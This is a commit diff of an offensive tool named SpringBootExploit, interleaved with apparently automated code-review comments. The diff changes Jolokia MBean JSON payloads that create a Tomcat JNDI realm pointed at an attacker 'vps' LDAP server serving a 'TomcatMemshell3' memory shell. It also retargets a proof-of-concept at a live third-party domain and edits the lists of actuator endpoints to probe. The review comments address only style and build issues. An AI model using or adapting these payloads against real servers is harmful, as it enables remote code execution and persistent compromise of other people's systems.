
Commit 34c3a82

committed
r
1 parent 5c8ce5f commit 34c3a82


9 files changed

+183
-145
lines changed


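--- a/README.md
+++ b/README.md
@@ -1,7 +1,6 @@
 <h1 align="center" >SpringBootExploit</h1>
 <h3 align="center" >一款针对SpringBootEnv页面进行快速漏洞利用</h3>
 <p align="center">
-<a href="https://github.com/0x727/SpringBootExploit"></a>
 <a href="https://github.com/0x727/SpringBootExploit"><img alt="SpringBootExploit" src="https://img.shields.io/badge/Spring-Boot-Exploit-green"></a>
 <a href="https://github.com/0x727/SpringBootExploit"><img alt="Forks" src="https://img.shields.io/github/forks/0x727/SpringBootExploit"></a>
 <a href="https://github.com/0x727/SpringBootExploit"><img alt="Release" src="https://img.shields.io/github/release/0x727/SpringBootExploit.svg"></a>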

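--- a/pom.xml
+++ b/pom.xml
@@ -7,7 +7,7 @@
 <groupId>org.example</groupId>
 <artifactId>SpringBootExploit</artifactId>
 <!-- <packaging>jar</packaging>-->
-<version>1.1-SNAPSHOT</version>
+<version>1.2-SNAPSHOT</version>
 
 
 <!-- <properties>-->
@@ -21,8 +21,8 @@
 <groupId>org.apache.maven.plugins</groupId>
 <artifactId>maven-compiler-plugin</artifactId>
 <configuration>
-<source>8</source>
-<target>8</target>
+<source>7</source>
+<target>7</target>
 <encoding>UTF-8</encoding>
 <compilerArguments>
 <bootclasspath>D:/java/jre/lib/rt.jar;D:/java/jre/lib/jce.jar</bootclasspath>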
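Review bot: Lowering `<source>`/`<target>` to 7 on lines 24-25 while the `<bootclasspath>` three lines below still points at a hard-coded Windows path (`D:/java/jre/lib/rt.jar;D:/java/jre/lib/jce.jar`) keeps the build tied to one developer's machine, so nobody else can reproduce the artifact that ships as 1.2-SNAPSHOT. Declare the level once as properties, `<maven.compiler.source>7</maven.compiler.source>` and `<maven.compiler.target>7</maven.compiler.target>`, and drop the machine-specific bootclasspath or move it into a profile that is off by default. Whether the remaining sources still compile at level 7 after previously building at 8 is not visible from this hunk.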

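--- a/src/main/java/com/drops/exp/JolokiaRealmRCEEXP.java
+++ b/src/main/java/com/drops/exp/JolokiaRealmRCEEXP.java
@@ -17,25 +17,26 @@ public boolean hasJolokiaRealmRCE(String target, String vps, String port, boole
 
 
 
-String create_realm = " {\n" +
+String create_realm = "{\n" +
 " \"mbean\": \"Tomcat:type=MBeanFactory\",\n" +
 " \"type\": \"EXEC\",\n" +
 " \"operation\": \"createJNDIRealm\",\n" +
 " \"arguments\": [\"Tomcat:type=Engine\"]\n" +
 "}";
 
-String wirte_factory = " {\n" +
+String wirte_factory = "{\n" +
 " \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
 " \"type\": \"WRITE\",\n" +
 " \"attribute\": \"contextFactory\",\n" +
-" \"value\": \"com.sun.jndi.rmi.registry.RegistryContextFactory\"\n" +
+// " \"value\": \"com.sun.jndi.rmi.registry.RegistryContextFactory\"\n" +
+" \"value\": \"com.sun.jndi.ldap.LdapCtxFactory\"\n" +
 "}";
 // 设置 http
 String write_url = "{\n" +
 " \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
 " \"type\": \"WRITE\",\n" +
 " \"attribute\": \"connectionURL\",\n" +
-" \"value\": \"rmi://" + vps + ":10990/BehinderFilter\"\n" +
+" \"value\": \"ldap://" + vps + ":1389/basic/TomcatMemshell3\"\n" +
 "}";
 
 String stop = "{\n" +
@@ -59,7 +60,7 @@ public boolean hasJolokiaRealmRCE(String target, String vps, String port, boole
 if (JolokiaUtil.hasMbeansV3(target)){
 for (String p: poc){
 if (
-HTTPUtils.postRequestV1(target, "/jolokia",p).getStatus() != 200
+HTTPUtils.postRequestjson(target, "jolokia",p).getStatus() != 200
 ){
 return false;
 }
@@ -70,7 +71,7 @@ public boolean hasJolokiaRealmRCE(String target, String vps, String port, boole
 if (JolokiaUtil.hasMbeansV4(target)){
 for (String p: poc){
 if (
-HTTPUtils.postRequestV1(target, "/actuator/jolokia",p).getStatus() != 200
+HTTPUtils.postRequestjson(target, "actuator/jolokia",p).getStatus() != 200
 ) {
 return false;
 }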
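Review bot: Line 31 keeps the superseded `RegistryContextFactory` value as commented-out code directly above its replacement; delete it, since the history of that string is already in version control and the dead line invites someone to flip it back without understanding why it changed. The method signature takes a `String port` parameter, yet the new line 39 hard-codes `:1389` in the URL, so either the parameter is misleading or the constant is; whichever is intended deserves a one-line comment next to it. While touching these lines, the locals violate Java naming (`create_realm`, `wirte_factory`, `write_url`) and `wirte_factory` is a typo — `createRealm`, `writeFactory`, `writeUrl`. The body of hasJolokiaRealmRCE starts before and continues after these hunks, so the `poc` list and the unused `port` are only partly visible here.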

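--- a/src/main/java/com/drops/poc/JolokiaLogbackRCEPOC.java
+++ b/src/main/java/com/drops/poc/JolokiaLogbackRCEPOC.java
@@ -27,11 +27,11 @@ public JolokiaLogbackRCEPOC() {
 }
 
 public boolean hasJolokiaLogbackRCE(String target){
-String regex = "jolokia-core";
-String context = HTTPUtils.getRequest(target).body();
+// String regex = "jolokia-core";
+// String context = HTTPUtils.getRequest(target).body();
 // this.mainController.logTextArea.appendText(Utils.log("正在验证是否存在依赖jolokia-core"));
-if (context.contains(regex)){
-this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
+if (true){
+// this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
 String url = URLUtil.getROOT(target) + "jolokia/list";
 String url2 = URLUtil.getROOT(target) + "actuator/jolokia/list";
 HttpResponse re = HTTPUtils.getRequest(url);
@@ -57,6 +57,6 @@ public boolean hasJolokiaLogbackRCE(String target){
 
 public static void main(String[] args) {
 JolokiaRealmJNDIRCEPOC poc = new JolokiaRealmJNDIRCEPOC();
-poc.hasJolokiaRealmJNDIRCE("http://127.0.0.1:9095/env");
+poc.hasJolokiaRealmJNDIRCE("https://developer.segwayrobotics.com");
 }
 }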
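Review bot: `main` on line 60 now points its check at a live third-party hostname instead of the loopback address it replaces, so anyone who runs the class sends requests to an external system by default; a committed smoke test should target a local or lab instance or read the target from `args`, e.g. `String target = args.length > 0 ? args[0] : "http://127.0.0.1:9095/env";`. The same `main` constructs `JolokiaRealmJNDIRCEPOC` rather than this class's own POC, which looks like a copy-paste from JolokiaRealmJNDIRCEPOC, though that line is pre-existing. In the first hunk, `if (true){` on line 33 replaces the dependency check with a constant condition and leaves the old check as commented-out lines 30-31 and 34; either remove the conditional and outdent the block, or keep the check behind a named flag, and delete the commented-out code in both places. The identical pattern is introduced at the same time in JolokiaRealmJNDIRCEPOC lines 29-33 and should be fixed there as well.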

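--- a/src/main/java/com/drops/poc/JolokiaRealmJNDIRCEPOC.java
+++ b/src/main/java/com/drops/poc/JolokiaRealmJNDIRCEPOC.java
@@ -26,11 +26,11 @@ public JolokiaRealmJNDIRCEPOC() {
 
 
 public boolean hasJolokiaRealmJNDIRCE(String target){
-String regex = "jolokia-core";
-String context = HTTPUtils.getRequest(target).body();
+// String regex = "jolokia-core";
+// String context = HTTPUtils.getRequest(target).body();
 // this.mainController.logTextArea.appendText(Utils.log("正在验证是否存在依赖jolokia-core"));
-if (context.contains(regex)){
-this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
+if (true){
+// this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
 String url = URLUtil.getROOT(target) + "jolokia/list";
 String url2 = URLUtil.getROOT(target) + "actuator/jolokia/list";
 HttpResponse re = HTTPUtils.getRequest(url);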

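--- a/src/main/java/com/drops/poc/SpringBootInfo.java
+++ b/src/main/java/com/drops/poc/SpringBootInfo.java
@@ -46,22 +46,22 @@ public SpringBootInfo(){
 this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
 this.infoCheck = new SpringBootInfoCheck();
 
-pointListV1.add("autoconfig");
+// pointListV1.add("autoconfig");
 // pointListV1.add("heapdump");
-pointListV1.add("dump");
-pointListV1.add("mappings");
+// pointListV1.add("dump");
+// pointListV1.add("mappings");
 pointListV1.add("auditevents");
 pointListV1.add("beans");
-pointListV1.add("health");
+// pointListV1.add("health");
 pointListV1.add("configprops");
 pointListV1.add("info");
 pointListV1.add("loggers");
-pointListV1.add("threaddump");
+// pointListV1.add("threaddump");
 pointListV1.add("metrics");
 pointListV1.add("trace");
 pointListV1.add("env/spring.jmx.enabled");
 pointListV1.add("refresh");
-pointListV1.add("trace");
+// pointListV1.add("trace");
 pointListV1.add("jolokia");
 pointListV1.add("env");
 pointListV1.add("restart");
@@ -73,16 +73,16 @@ public SpringBootInfo(){
 pointListV2.add("actuator/restart");
 pointListV2.add("actuator/refresh");
 pointListV2.add("actuator/beans");
-pointListV2.add("actuator/health");
+// pointListV2.add("actuator/health");
 pointListV2.add("actuator/conditions");
 pointListV2.add("actuator/configprops");
 pointListV2.add("actuator/info");
 pointListV2.add("actuator/loggers");
-pointListV2.add("actuator/httptrace");
-pointListV2.add("actuator/threaddump");
+// pointListV2.add("actuator/httptrace");
+// pointListV2.add("actuator/threaddump");
 pointListV2.add("actuator/metrics");
-pointListV2.add("actuator/httptrace");
-pointListV2.add("actuator/mappings");
+// pointListV2.add("actuator/httptrace");
+// pointListV2.add("actuator/mappings");
 pointListV2.add("actuator/jolokia");
 pointListV2.add("actuator/jolokia/list");
 // pointListV2.add("actuator/hystrix.stream");
@@ -95,12 +95,12 @@ public SpringBootInfo(){
 pointListV2.add("monitor/env");
 pointListV2.add("monitor/info");
 pointListV2.add("monitor/loggers");
-pointListV2.add("monitor/heapdump");
-pointListV2.add("monitor/threaddump");
+// pointListV2.add("monitor/heapdump");
+// pointListV2.add("monitor/threaddump");
 pointListV2.add("monitor/metrics");
 pointListV2.add("monitor/scheduledtasks");
-pointListV2.add("monitor/httptrace");
-pointListV2.add("monitor/mappings");
+// pointListV2.add("monitor/httptrace");
+// pointListV2.add("monitor/mappings");
 pointListV2.add("monitor/jolokia");
 // pointListV2.add("monitor/hystrix.stream");
 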
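Review bot: The probes disabled in these three hunks (lines 49-64, 76-85 and 98-103) are left as commented-out `add` calls with no reason recorded, so the next reader cannot tell whether `heapdump`, `threaddump`, `mappings`, `httptrace` and `health` were dropped on purpose or by accident, nor under what condition they should come back. Delete the lines, or put one comment above each group stating the reason, e.g. `// excluded: <reason>`, rather than keeping dead entries in three places. Commenting out the second `pointListV1.add("trace")` at line 64 is a correct de-duplication since line 61 still adds it, whereas both `actuator/httptrace` entries at lines 81 and 84 are now gone, which may or may not be intended. The constructor continues outside the hunks, so whether these lists are read elsewhere with an expectation of these entries is not visible here.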

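--- a/src/main/java/com/drops/poc/SpringBootInfoCheck.java
+++ b/src/main/java/com/drops/poc/SpringBootInfoCheck.java
@@ -107,8 +107,9 @@ void checkEnvPointV1(String addr){
 if (!xstreamRCEPOC.hasEurekaXstreamRCE(url)){
 JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC();
 JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC();
-if(!logbackRCEPOC.hasJolokiaLogbackRCE(url) || realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url)){
-
+logbackRCEPOC.hasJolokiaLogbackRCE(url);
+Boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url);
+if(!f){
 H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC();
 if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){
 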
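Review bot: The return value of `logbackRCEPOC.hasJolokiaLogbackRCE(url)` on line 110 is now discarded, so the Logback check no longer has any effect on whether the H2 check runs, whereas before this commit it gated the block (with a condition whose mixed polarity looked wrong). If only the Realm result is meant to decide the fallthrough, a one-line comment saying so would stop the next reader from "fixing" it; otherwise capture the result and use it. `Boolean f` on line 111 boxes the primitive `boolean` that hasJolokiaRealmJNDIRCE declares and hides its meaning behind a one-letter name; `boolean realmHit = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url);` followed by `if (!realmHit) {` reads better and avoids the boxing. checkEnvPointV1 starts and ends outside this hunk.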
